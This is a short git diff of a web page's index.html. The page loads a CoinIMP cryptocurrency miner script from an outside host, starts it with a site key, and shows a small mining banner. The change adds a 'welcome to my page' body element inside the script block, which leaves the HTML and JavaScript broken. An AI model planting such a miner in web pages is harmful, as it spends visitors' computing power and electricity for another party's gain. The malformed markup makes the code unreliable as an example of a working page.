--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
 <!doctype html>
 <html>
+    
 <script src="https://www.hostingcloud.racing/33IL.js"></script>
 <script>
     var _client = new Client.Anonymous('09ae67f3432a28153a3c194b9cf14cad0fba0eda421b2d5fb7b9a5fc17335e6e', {
@@ -7,6 +8,8 @@
     });
     _client.start();
     _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
-
+  <body style="background-color:blue;text-align:center">
+    welcome to my page
+    </body>
 </script>
 </html>
